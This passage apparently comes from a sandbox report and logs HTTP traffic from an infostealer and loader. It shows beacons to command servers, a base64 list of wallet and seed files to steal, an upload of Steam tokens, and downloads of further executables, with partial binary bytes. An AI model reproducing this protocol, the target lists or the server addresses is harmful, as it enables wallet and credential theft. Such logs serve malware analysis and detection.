Nov 12, 2024 00:06:30.706192017 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="message"wallets------DAAAKFHIEGDGCAAAEGDG--
Nov 12, 2024 00:06:30.908030987 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 12, 2024 00:06:30.911041975 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEH Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"files------CAEGHIJEHJDHIDHIDAEH--
Nov 12, 2024 00:06:31.112570047 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:31.265466928 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file"------IDBKFHJEBAAEBGDGDBFB--
Nov 12, 2024 00:06:31.956988096 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 12, 2024 00:06:31.959831953 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="message"ybncbhylepme------IJKKKFCFHCFIECBGDHID--
Nov 12, 2024 00:06:32.161838055 CET	271	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 12, 2024 00:06:34.656786919 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECG Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 4b 45 43 47 2d 2d 0d 0a Data Ascii: ------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------GIJDAFBKFIECBGCAKECGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJDAFBKFIECBGCAKECG--
Nov 12, 2024 00:06:35.346987963 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49957	185.215.113.16	80	3724	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:06:32.174664974 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 12, 2024 00:06:32.815886974 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:06:32 GMT Content-Type: application/octet-stream Content-Length: 3271168 Last-Modified: Mon, 11 Nov 2024 22:53:04 GMT Connection: keep-alive ETag: "67328ad0-31ea00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@ 2O2@Wkl11 @.rsrc@.idata @lwvftjpd0+0+@ppdaehht11@.taggant01"1@
Nov 12, 2024 00:06:32.815901041 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:06:32.815912008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:06:32.815923929 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:06:32.815936089 CET	848	IN	Data Raw: b8 db 98 3a c1 6c 80 80 08 40 c3 a8 09 58 bb ca d1 9c 53 22 fc 1b 55 3a 61 1b 20 07 d5 c2 5f a2 18 dc 98 3a c1 8c 81 80 08 40 a3 a8 09 58 bb 2a d2 9c 53 22 dc 1b 55 3a 61 1b 20 07 d5 c2 57 a2 28 dc 98 3a c1 3c 7d 80 08 40 83 a8 09 58 bb 8a d2 9c Data Ascii: :l@XS"U:a _:@X*S"U:a W(:<}@XS"U:a k0:@cXS"U:a L:}@CXJS"\|U:a _:\|@#XS"\U:a _:h@XS"<U:a :\|@XjS
Nov 12, 2024 00:06:32.815946102 CET	1236	IN	Data Raw: db 9c 53 22 bc 18 55 3a 61 1b 20 07 d5 c2 5f a2 d8 dd 98 3a c1 f4 7f 80 08 40 63 a5 09 58 bb ea db 9c 53 22 9c 18 55 3a 61 1b 20 07 d5 c2 57 a2 e8 dd 98 3a c1 d4 81 80 08 40 43 a5 09 58 bb 4a dc 9c 53 22 7c 18 55 3a 61 1b 20 07 d5 c2 57 a2 f0 dd Data Ascii: S"U:a _:@cXS"U:a W:@CXJS"\|U:a W:@#XS"\U:a W:@XS"<U:a W:@XjS"U:a [:4@XS"U:a _:@X*S"U:a _$
Nov 12, 2024 00:06:32.815957069 CET	1236	IN	Data Raw: c1 a4 87 80 08 40 a3 a0 09 58 bb 2a ea 9c 53 22 dc 13 55 3a 61 1b 20 07 d5 c2 63 a2 e8 df 98 3a c1 64 82 80 08 40 83 a0 09 58 bb 8a ea 9c 53 22 bc 13 55 3a 61 1b 20 07 d5 c2 63 a2 fc df 98 3a c1 d8 88 80 08 40 63 a0 09 58 bb ea ea 9c 53 22 9c 13 Data Ascii: @X*S"U:a c:d@XS"U:a c:@cXS"U:a W:@CXJS"\|U:a W:l@#XS"\U:a :@XS"<U:a [d:@XjS"U:a p:@XS"U
Nov 12, 2024 00:06:32.815968990 CET	1236	IN	Data Raw: 61 1b 20 07 d5 c2 5b a2 5c e4 98 3a c1 64 7f 80 08 40 c3 9b 09 58 bb ca f8 9c 53 22 fc 0e 55 3a 61 1b 20 07 d5 c2 67 a2 68 e4 98 3a c1 fc 83 80 08 40 a3 9b 09 58 bb 2a f9 9c 53 22 dc 0e 55 3a 61 1b 20 07 d5 c2 87 a2 80 e4 98 3a c1 fc 80 80 08 40 Data Ascii: a [\:d@XS"U:a gh:@X*S"U:a :@XS"U:a W:$}@cXS"U:a k:D@CXJS"\|U:a [:@#XS"\U:a [:@XS"<U:a -MX;_YS$
Nov 12, 2024 00:06:32.815980911 CET	1236	IN	Data Raw: d5 ad de 26 5f e3 c8 42 17 af 13 91 6e 67 29 41 f0 52 e4 3b 08 ae 3b 3e 99 59 53 bd cc 60 de 00 67 b5 16 07 d5 24 20 07 d5 24 20 07 d5 24 20 07 d5 ad de 26 73 57 bc 52 91 9c 53 9e a9 58 53 3a 08 a8 f4 4e 28 9e 53 6d cd a8 e0 7f fc bc f6 3a 08 58 Data Ascii: &_Bng)AR;;>YS`g$ $ $ &sWRSXS:N(Sm:XSM`XS:;YS$ $ $ &D`UL<mWSX:Gi=$ &_DJ_A]:ng);[\"kV:\YeX:$ $ $ &_DJ_A]:ng);[\"kV
Nov 12, 2024 00:06:32.815989971 CET	48	IN	Data Raw: 0b 58 d6 fe 0c 4e 99 42 09 cc 5e a4 1c ae 3b a8 b5 59 53 bd cc 60 de 00 67 b5 15 3f 08 ad de 26 73 57 bc c2 91 9c 53 9e a9 58 53 3a 08 a8 d6 26 Data Ascii: XNB^;YS`g?&sWSXS:&
Nov 12, 2024 00:06:32.820786953 CET	1236	IN	Data Raw: 25 ae f4 4e 28 9e 53 6d cd a8 e0 7f fc bc f6 3a 08 58 53 c5 f9 e1 c8 2a 73 58 bb a5 89 9d 53 c7 55 30 dd af f8 1f 99 22 09 58 53 3a cf 9d 3f 4a 08 58 53 00 4e 30 54 22 7a af 54 3a 95 9d 2b 02 4e 54 54 3a 08 58 a3 39 7e 64 de 08 08 cd 5b 22 52 55 Data Ascii: %N(Sm:XS*sXSU0"XS:?JXSN0T"zT:+NTT:X9~d["RUS:?hb+}4hS:zh^3KZ\|'<C^@MXGeS:X=X;J[S$ $ &_BQB]:ng);W#b=[S`FcOh_@MXeX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	50229	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:03.649507046 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 12, 2024 00:07:04.294670105 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	50234	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:05.811695099 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 12, 2024 00:07:06.647099972 CET	808	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 36 39 0d 0a 20 3c 63 3e 31 30 30 35 36 32 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 36 39 65 34 34 31 64 66 30 35 36 66 63 34 39 23 31 30 30 35 36 32 38 30 34 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 30 32 62 38 32 36 35 34 62 39 31 31 64 66 34 35 66 31 35 23 31 30 30 35 36 33 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 35 63 30 31 66 65 39 63 30 39 33 31 37 35 31 66 33 62 66 30 35 65 66 61 39 36 64 65 61 39 65 37 66 62 62 61 63 65 33 30 39 65 30 66 34 39 61 36 35 36 23 31 30 30 35 36 34 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 [TRUNCATED] Data Ascii: 269 <c>1005627001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd769e441df056fc49#1005628041+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc02b82654b911df45f15#1005637001+++b5937c1ad0c0f9c35c01fe9c0931751f3bf05efa96dea9e7fbbace309e0f49a656#1005642001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1005643001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1005644031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1005645001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50236	31.41.244.11	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:06.655621052 CET	53	OUT	GET /files/file1.exe HTTP/1.1 Host: 31.41.244.11
Nov 12, 2024 00:07:07.864164114 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:07 GMT Content-Type: application/octet-stream Content-Length: 1888768 Last-Modified: Mon, 11 Nov 2024 22:04:59 GMT Connection: keep-alive ETag: "67327f8b-1cd200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 3b a0 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 be 03 00 00 c2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 48 a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 